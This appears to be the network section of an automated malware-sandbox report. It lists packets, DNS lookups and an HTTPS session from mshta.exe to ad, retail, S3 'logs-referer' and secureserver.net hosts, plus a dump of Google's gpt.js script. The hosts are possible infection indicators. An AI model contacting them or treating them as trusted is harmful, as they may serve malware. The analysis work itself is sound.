                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.165354967 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.165385962 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.165579081 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.166153908 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.166295052 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.166302919 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.166362047 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.179621935 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.179732084 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.179738998 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.179881096 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.180141926 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.180219889 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.180928946 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.181046963 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.181054115 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.181113005 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.181807041 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.181951046 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.194209099 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.194540024 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.194549084 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.195378065 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.195470095 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.195478916 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.195905924 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.195911884 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.196054935 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.208141088 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.208235979 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.208252907 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.208348989 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.208570004 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.209459066 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.209578991 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.209619045 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.209626913 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.209666014 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.209872007 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.222104073 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.222520113 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.222649097 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.222667933 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.222676992 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.223443985 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.224064112 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.224071980 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.224189043 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.235833883 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.236239910 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.236361980 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.236402035 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.236409903 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.236731052 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.237140894 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.237230062 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.237236023 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.237395048 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.249432087 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.249569893 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.249577999 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.249741077 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.249877930 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.250035048 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.250041008 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.250160933 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.250758886 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.251738071 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.251744032 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.251831055 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.258162975 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.258244038 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.258287907 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.258372068 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.258754969 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.258977890 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.258984089 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.259143114 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.259677887 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.259843111 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.259849072 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.260018110 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.271148920 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.271272898 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.271428108 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.271498919 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.271516085 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.271564960 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.272376060 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.272478104 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.273144007 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.273241997 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.273292065 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.273367882 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.284024954 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.284149885 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.284410954 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.284535885 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.284543037 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.284780979 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.285315990 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.285404921 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.285414934 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.285486937 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.295845032 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.295957088 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.295963049 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.296365023 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.296514034 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.296520948 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.296659946 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.297130108 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.297322035 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.297328949 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.297492981 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.307607889 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.308017015 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.308135986 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.308161974 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.308170080 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.308456898 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.308968067 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.309056997 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.309072018 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.309179068 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.318001986 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.318439007 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.318557024 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.318592072 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.318599939 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.319042921 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.319303036 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.319438934 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.319446087 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.319633007 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.320255041 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.320337057 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.320346117 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.320346117 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.320359945 CET44349859172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.320414066 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:34:08.320503950 CET49859443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.690011978 CET6143353192.168.2.61.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.692848921 CET5281853192.168.2.61.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.695447922 CET6302953192.168.2.61.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.735551119 CET6540653192.168.2.61.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.826877117 CET53614331.1.1.1192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:35.699908018 CET5281853192.168.2.61.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:33:57.804836035 CET6062553192.168.2.61.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:33:57.807147026 CET6234153192.168.2.61.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.152857065 CET53623411.1.1.1192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.576435089 CET4965753192.168.2.61.1.1.1
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET53606251.1.1.1192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.150968075 CET53496571.1.1.1192.168.2.6
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.690011978 CET192.168.2.61.1.1.10xaa05Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.692848921 CET192.168.2.61.1.1.10x141Standard query (0)www.americanas.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.695447922 CET192.168.2.61.1.1.10x26caStandard query (0)images-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.735551119 CET192.168.2.61.1.1.10xdb51Standard query (0)statics-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:35.699908018 CET192.168.2.61.1.1.10x141Standard query (0)www.americanas.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:57.804836035 CET192.168.2.61.1.1.10xc099Standard query (0)logs-referer.s3-sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:57.807147026 CET192.168.2.61.1.1.10x2af5Standard query (0)s3-sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.576435089 CET192.168.2.61.1.1.10x15d9Standard query (0)102.57.205.92.host.secureserver.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.826877117 CET1.1.1.1192.168.2.60xaa05No error (0)securepubads.g.doubleclick.net172.217.19.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:35.324471951 CET1.1.1.1192.168.2.60xdb51No error (0)statics-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:35.324851990 CET1.1.1.1192.168.2.60x26caNo error (0)images-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:35.708744049 CET1.1.1.1192.168.2.60x141No error (0)www.americanas.com.brsni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:35.836930990 CET1.1.1.1192.168.2.60x141No error (0)www.americanas.com.brsni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.152857065 CET1.1.1.1192.168.2.60x2af5No error (0)s3-sa-east-1.amazonaws.com16.12.1.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.152857065 CET1.1.1.1192.168.2.60x2af5No error (0)s3-sa-east-1.amazonaws.com3.5.232.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.152857065 CET1.1.1.1192.168.2.60x2af5No error (0)s3-sa-east-1.amazonaws.com16.12.0.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.152857065 CET1.1.1.1192.168.2.60x2af5No error (0)s3-sa-east-1.amazonaws.com16.12.0.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.152857065 CET1.1.1.1192.168.2.60x2af5No error (0)s3-sa-east-1.amazonaws.com52.95.164.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.152857065 CET1.1.1.1192.168.2.60x2af5No error (0)s3-sa-east-1.amazonaws.com52.95.163.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.152857065 CET1.1.1.1192.168.2.60x2af5No error (0)s3-sa-east-1.amazonaws.com16.12.0.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.152857065 CET1.1.1.1192.168.2.60x2af5No error (0)s3-sa-east-1.amazonaws.com3.5.234.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET1.1.1.1192.168.2.60xc099No error (0)logs-referer.s3-sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET1.1.1.1192.168.2.60xc099No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET1.1.1.1192.168.2.60xc099No error (0)s3-r-w.sa-east-1.amazonaws.com52.95.165.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET1.1.1.1192.168.2.60xc099No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET1.1.1.1192.168.2.60xc099No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET1.1.1.1192.168.2.60xc099No error (0)s3-r-w.sa-east-1.amazonaws.com52.95.165.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET1.1.1.1192.168.2.60xc099No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET1.1.1.1192.168.2.60xc099No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:58.712738991 CET1.1.1.1192.168.2.60xc099No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Dec 23, 2024 10:33:59.150968075 CET1.1.1.1192.168.2.60x15d9No error (0)102.57.205.92.host.secureserver.net92.205.57.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              • securepubads.g.doubleclick.net
                                                                                                                                                                                                                              • s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                              • logs-referer.s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                              • 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.649743172.217.19.1944433416C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:33:36 UTC327OUTGET /tag/js/gpt.js HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:33:37 GMT
                                                                                                                                                                                                                              Expires: Mon, 23 Dec 2024 09:33:37 GMT
                                                                                                                                                                                                                              Cache-Control: private, max-age=900, stale-while-revalidate=3600
                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                              ETag: 208 / 20080 / m202412090101 / config-hash: 16775640167977932469
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                                                              Content-Length: 105873
                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC603INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 73 74 74 63 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 29 7b 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 28 29 3b 7d 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 5f 6c 6f 61 64 65 64 5f 29 72 65 74 75 72 6e 3b 76 61 72 20 6e 2c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 2c 62 61 3d 74 79 70 65
                                                                                                                                                                                                                              Data Ascii: (function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=type
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC1390INData Raw: 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 2c 64 61 3d 63 61 28 74 68 69 73 29 2c 65 61 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 28 22 78 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 2c 74 3d 7b 7d 2c 66 61 3d 7b 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 63 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 63 3d 66 61 5b 62 5d 3b 69 66 28 63 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 63 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 61 5b 62 5d 7d 7d 2c 77 3d 66 75 6e
                                                                                                                                                                                                                              Data Ascii: &&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},u=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=fun
